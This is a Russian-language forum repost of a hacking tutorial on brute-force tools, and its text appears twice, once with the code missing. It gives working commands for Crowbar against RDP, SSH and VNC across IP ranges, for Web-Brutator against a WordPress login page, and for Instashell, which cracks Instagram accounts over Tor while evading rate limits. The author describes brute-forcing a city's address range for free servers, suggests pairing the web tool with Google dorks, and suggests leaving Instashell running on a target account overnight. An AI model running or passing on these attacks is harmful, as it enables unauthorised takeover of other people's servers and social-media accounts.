D2
Администратор
- Регистрация
- 19 Фев 2025
- Сообщения
- 4,380
- Реакции
- 0
Приветствую всех читателей наших статей, с сегодняшнего дня хочу объявить ещё одну новую рубрику: "Грубая сила". В серии таких статей мы будем обозревать различные инструменты, методы, вспомогательные инструменты для атак методом "грубой силы" откуда и название, или под более привычным для нас названием брутфорса.
В этой статье разберём один очень хороший и интересный инструмент для брутфорса Crowbar и ещё два полезных брутфорсера для более узконаправленных задач.
Код: Скопировать в буфер обмена
Для того чтобы проверить результаты работы нашего инструмента, установим дополнительно клиенты RDP, OpenVPN и VNC.
Код: Скопировать в буфер обмена
Ну или если же по каким-то причинам у вас не устанавливается Crowbar, то можно также установить напрямую из GitHub:
Код: Скопировать в буфер обмена
Ну а теперь давайте разберём примеры использования. Поскольку брутфорсеры в большинстве своём по использованию примерно одинаковые, примеры использования максимально понятны. Примеры взяты из официальной страницы GitHub, поэтому каких-либо конфиденциальных чужих данных в статье нет.
Пример работы с RDP
RDP (Remote Desktop Protocol) - технология для удаленного управления компьютером через интернет или сеть. Позволяет работать на удаленном компьютере, как будто вы перед ним сидите.
Здесь представлены варианты команд с использованием словарей и ручной выбор подбираемых логина и пароля, команды довольно понятные, но всё же распишу для тебя что где и за что отвечает.
Код: Скопировать в буфер обмена
Код: Скопировать в буфер обмена
-d rdp - выбор протокола который мы брутим, здесь у нас RDP, дальше он разумеется меняться будет.
-s 192.168.2.0/24 - здесь выбираем диапазон IP-адресов которые будем сканировать и брутить, ну думаю понятно что можно указать как диапазон, так и один адрес.
-u -U - через маленькую u мы вписываем один логин который хотим подобрать, а через большую U указываем путь до словаря через который собираемся подбирать логин.
-c -C - та же история что и с uU только тут у нас пароль, либо путь к словарю паролей.
-d - этот параметр отвечает за сканирование порта tcp на заданном нами диапазоне перед попыткой грубой силы. Что в свою очередь даст представление о том, открыт ли порт для атаки.
-k - для ключевых файлов (для SSH или VNC).
Пример работы с SSH
SSH - это протокол для безопасного удаленного подключения к компьютеру или серверу через интернет. Он обеспечивает шифрование данных и аутентификацию пользователей, что делает подключение безопасным.
Здесь у нас три примера:
VNC (Virtual Network Computing) — это широко распространенный метод удаленного доступа к рабочему столу компьютера по сети.
Файл пароля с заданным номером порта:
Код: Скопировать в буфер обмена
Пример на практике
Если привести свой практический пример, то в теории можно брать диапазоны адресов в различных городах, сканить, брутить и получать халявные дедики, но опять же это не надёжно и что самое главное незаконно. В примере я взял диапазон IP-адресов города "X" и пробрутил его при помощи словарей login.txt и password.txt.
Код: Скопировать в буфер обмена
Запускаем и смотрим какие опции нам доступны:
Ну а теперь давайте на примере разберём его использование:
Код: Скопировать в буфер обмена
--target standartform - используем стандартную опцию для идентификации CMS.
--url - расположение страницы входа на целевой сайт.
-u -U - через маленькую логин который хотим подобрать, через большую путь к списку логинов.
-p -P - та же история только с паролями.
-s - остановка при успехе.
-t - число потоков.
-v - вывод каждой попытки.
Ну что же по опциям определились, давайте теперь посмотрим на деле.
Как видим, попытка завершилась успехом! Инструмент довольно неплох, особенно если его автоматизировать и использовать с соответствующими гугл-дорками.
Код: Скопировать в буфер обмена
Ну и примерно по такому принципу у нас работает InstaShell. Для логина годится ник пользователя или номер телефона если имеется, так же под цель можно создать отдельный словарь паролей, поставить на ночь грубо говоря и ожидать результат.
Автор: канал Life-Hack [Жизнь-Взлом] adm1ngmz
взято с Хабра
В этой статье разберём один очень хороший и интересный инструмент для брутфорса Crowbar и ещё два полезных брутфорсера для более узконаправленных задач.
Crowbar
Что это?
Crowbar - это инструмент для перебора паролей, который применяется в ходе тестирования на проникновение. Crowbar поддерживает протоколы: OpenVPN, Remote Desktop Protocol (RDP) с поддержкой NLA, Аутентификацию по приватному ключу SSH и Аутентификацию по ключу VNC.Установка и применение
В дистрибутиве Kali Linux этот инструмент можно легко установить всего одной командой:Код: Скопировать в буфер обмена
apt install crowbar
Для того чтобы проверить результаты работы нашего инструмента, установим дополнительно клиенты RDP, OpenVPN и VNC.
Код: Скопировать в буфер обмена
sudo apt-get install -y openvpn freerdp-x11 vncviewer
Ну или если же по каким-то причинам у вас не устанавливается Crowbar, то можно также установить напрямую из GitHub:
Код: Скопировать в буфер обмена
Код:
git clone https://github.com/galkan/crowbar
cd crowbar/
pip3 install -r requirements.txt
Пример работы с RDP
RDP (Remote Desktop Protocol) - технология для удаленного управления компьютером через интернет или сеть. Позволяет работать на удаленном компьютере, как будто вы перед ним сидите.
Здесь представлены варианты команд с использованием словарей и ручной выбор подбираемых логина и пароля, команды довольно понятные, но всё же распишу для тебя что где и за что отвечает.
Код: Скопировать в буфер обмена
crowbar -b rdp -s 192.168.2.182/32 -u admin -c Aa123456
Код: Скопировать в буфер обмена
crowbar -b rdp -s 192.168.2.0/24 -U ~/Desktop/userlist -C ~/Desktop/passlist -d
-d rdp - выбор протокола который мы брутим, здесь у нас RDP, дальше он разумеется меняться будет.
-s 192.168.2.0/24 - здесь выбираем диапазон IP-адресов которые будем сканировать и брутить, ну думаю понятно что можно указать как диапазон, так и один адрес.
-u -U - через маленькую u мы вписываем один логин который хотим подобрать, а через большую U указываем путь до словаря через который собираемся подбирать логин.
-c -C - та же история что и с uU только тут у нас пароль, либо путь к словарю паролей.
-d - этот параметр отвечает за сканирование порта tcp на заданном нами диапазоне перед попыткой грубой силы. Что в свою очередь даст представление о том, открыт ли порт для атаки.
-k - для ключевых файлов (для SSH или VNC).
Пример работы с SSH
SSH - это протокол для безопасного удаленного подключения к компьютеру или серверу через интернет. Он обеспечивает шифрование данных и аутентификацию пользователей, что делает подключение безопасным.
Здесь у нас три примера:
- с использованием одного имени пользователя и одного пароля
Код: Скопировать в буфер обмена
crowbar -b sshkey -s 192.168.2.105/32 -u root -k ~/.ssh/id_rsa
- с использованием одного имени и все ключи SSH в папке
Код: Скопировать в буфер обмена
crowbar -b sshkey -s 192.168.2.105/32 -u root -k ~/.ssh/
- через режим обнаружения
Код: Скопировать в буфер обмена
crowbar -b sshkey -s 192.168.2.0/24 -u root -k ~/.ssh/ -d
VNC (Virtual Network Computing) — это широко распространенный метод удаленного доступа к рабочему столу компьютера по сети.
Файл пароля с заданным номером порта:
Код: Скопировать в буфер обмена
crowbar -b vnckey -s 192.168.2.105/32 -p 5902 -k ~/.vnc/passwd
Пример на практике
Если привести свой практический пример, то в теории можно брать диапазоны адресов в различных городах, сканить, брутить и получать халявные дедики, но опять же это не надёжно и что самое главное незаконно. В примере я взял диапазон IP-адресов города "X" и пробрутил его при помощи словарей login.txt и password.txt.

Web Brutator
Что это?
Web-brutator способен автоматически обнаруживать стандартные формы аутентификации в сети Интернет и проводить автоматизированные атаки методом перебора паролей.Установка и использование
Ну тут впрочем ничего нового так же клонируем репозиторий и устанавливаем модули python.Код: Скопировать в буфер обмена
Код:
git clone https://github.com/koutto/web-brutator.git
cd web–brutator/
pip install –r requirements.txt
python web-brutator.py -h

Ну а теперь давайте на примере разберём его использование:
Код: Скопировать в буфер обмена
python3 web–brutator.py --target standardform --url https://site.com/wp-login.php -u admin -P pass.txt -s -t 40 -v
--target standartform - используем стандартную опцию для идентификации CMS.
--url - расположение страницы входа на целевой сайт.
-u -U - через маленькую логин который хотим подобрать, через большую путь к списку логинов.
-p -P - та же история только с паролями.
-s - остановка при успехе.
-t - число потоков.
-v - вывод каждой попытки.
Ну что же по опциям определились, давайте теперь посмотрим на деле.


Как видим, попытка завершилась успехом! Инструмент довольно неплох, особенно если его автоматизировать и использовать с соответствующими гугл-дорками.
Instashell
Instashell представляет собой скрипт, предназначенный для проведения брутфорс-атак на Instagram. Благодаря способности обхода ограничений на перебор паролей, этот скрипт может без ограничений тестировать множество возможных паролей.Установка и использование
Здесь в основном всё стандартно в установке, единственное что нам обязателен к установке Tor.Код: Скопировать в буфер обмена
Код:
apt-get install tor
git clone https://github.com/thelinuxchoice/instashell
cd instashell
chmod +x instashell.sh
service tor start
sudo ./instashell.sh

Ну и примерно по такому принципу у нас работает InstaShell. Для логина годится ник пользователя или номер телефона если имеется, так же под цель можно создать отдельный словарь паролей, поставить на ночь грубо говоря и ожидать результат.
Автор: канал Life-Hack [Жизнь-Взлом] adm1ngmz
взято с Хабра